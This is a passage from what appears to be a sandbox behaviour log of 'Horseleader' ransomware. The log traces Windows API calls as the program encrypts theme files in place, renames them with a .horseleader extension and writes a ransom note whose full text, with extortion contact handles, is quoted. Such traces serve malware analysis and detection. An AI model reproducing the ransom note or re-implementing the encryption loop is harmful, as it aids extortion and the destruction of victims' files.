dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.336] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1d1, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1d1, lpOverlapped=0x0) returned 1 [0246.337] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.337] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.337] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.337] CloseHandle (hObject=0x1a4) returned 1 [0246.338] GetProcessHeap () returned 0x780000 [0246.338] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.338] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF.horseleader") returned 89 [0246.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.inf.horseleader")) returned 1 [0246.341] GetProcessHeap () returned 0x780000 [0246.341] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.341] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | 
out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x3b1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.341] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.342] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 78 [0246.342] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.342] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.342] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.342] lstrlenW (lpString=".testttjffg") returned 11 [0246.342] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.342] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.342] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.342] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.343] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 78 [0246.343] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.343] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=945) returned 1 [0246.343] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3b1, lpOverlapped=0x0) returned 1 [0246.345] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffc4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.345] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3b1, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3b1, lpOverlapped=0x0) returned 1 [0246.345] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.346] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.346] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.346] CloseHandle (hObject=0x1a4) returned 1 [0246.346] GetProcessHeap () returned 0x780000 [0246.346] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.346] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.horseleader") returned 90 [0246.346] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif.horseleader")) returned 1 [0246.347] GetProcessHeap () returned 0x780000 [0246.347] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.347] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7f5f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.347] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.347] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 79 [0246.347] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.347] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.347] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.348] lstrlenW (lpString=".testttjffg") returned 11 [0246.348] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.348] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.348] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.348] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.348] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 79 [0246.348] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.348] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=32607) returned 1 [0246.348] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.351] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.351] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.352] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2f5f, lpOverlapped=0x0) returned 1 [0246.352] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd0a1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.352] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2f5f, lpNumberOfBytesWritten=0x32aeb7c, 
lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2f5f, lpOverlapped=0x0) returned 1 [0246.352] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.353] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.353] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.353] CloseHandle (hObject=0x1a4) returned 1 [0246.353] GetProcessHeap () returned 0x780000 [0246.353] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.353] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.horseleader") returned 91 [0246.353] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png.horseleader")) returned 1 [0246.354] GetProcessHeap () returned 0x780000 [0246.354] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.354] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7f5f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.354] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.354] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\#Decrypt#.txt") returned 80 [0246.355] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.355] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0246.355] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.356] lstrlenA (lpString="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") returned 1368 [0246.357] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.357] CloseHandle (hObject=0x158) returned 1 [0246.357] GetProcessHeap () returned 0x780000 [0246.357] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.357] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="CAPSULES", cAlternateFileName="")) returned 1 [0246.357] lstrcmpiW (lpString1="CAPSULES", lpString2="Windows") returned -1 [0246.357] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES") returned 68 [0246.357] lstrcmpW (lpString1="CAPSULES", lpString2=".") returned 1 [0246.357] lstrcmpW (lpString1="CAPSULES", lpString2="..") returned 1 [0246.357] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.358] GetProcessHeap () returned 0x780000 [0246.358] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.358] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\*") returned 70 [0246.358] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.358] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.358] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\.") returned 70 [0246.358] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.358] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.358] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.358] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\..") returned 71 [0246.358] lstrcmpW (lpString1="..", lpString2=".") 
returned 1 [0246.358] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.358] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecb88f00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x603362b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xecb88f00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xe1ba, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="CAPSULES.ELM", cAlternateFileName="")) returned 1 [0246.358] lstrcmpiW (lpString1="CAPSULES.ELM", lpString2="Windows") returned -1 [0246.359] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM") returned 81 [0246.359] StrStrIW (lpFirst="CAPSULES.ELM", lpSrch=".horseleader") returned 0x0 [0246.359] lstrcmpW (lpString1="CAPSULES.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.359] lstrcmpW (lpString1="CAPSULES.ELM", lpString2="_uninstalling_.png") returned 1 [0246.359] lstrlenW (lpString=".testttjffg") returned 11 [0246.359] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM", lpSrch=".testttjffg") returned 0x0 [0246.359] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.359] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.359] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.361] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM") returned 81 [0246.361] StrStrW (lpFirst="CAPSULES.ELM", lpSrch=".txt") returned 0x0 [0246.361] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=57786) returned 1 [0246.361] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.365] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.365] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.365] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.366] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.366] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.366] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x41ba, lpOverlapped=0x0) returned 1 [0246.366] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffbe46, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.367] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x41ba, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x41ba, lpOverlapped=0x0) returned 1 [0246.367] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.367] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.367] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.367] CloseHandle (hObject=0x1a4) returned 1 [0246.367] GetProcessHeap () returned 0x780000 [0246.367] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.368] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM.horseleader") returned 93 [0246.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.elm.horseleader")) returned 1 [0246.368] GetProcessHeap () returned 0x780000 [0246.368] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.369] FindNextFileW (in: hFindFile=0x7c6760, 
lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf86a7300, ftCreationTime.dwHighDateTime=0x1c47827, ftLastAccessTime.dwLowDateTime=0x51c2ab50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf86a7300, ftLastWriteTime.dwHighDateTime=0x1c47827, nFileSizeHigh=0x0, nFileSizeLow=0x1f5, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="CAPSULES.INF", cAlternateFileName="")) returned 1 [0246.369] lstrcmpiW (lpString1="CAPSULES.INF", lpString2="Windows") returned -1 [0246.369] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF") returned 81 [0246.369] StrStrIW (lpFirst="CAPSULES.INF", lpSrch=".horseleader") 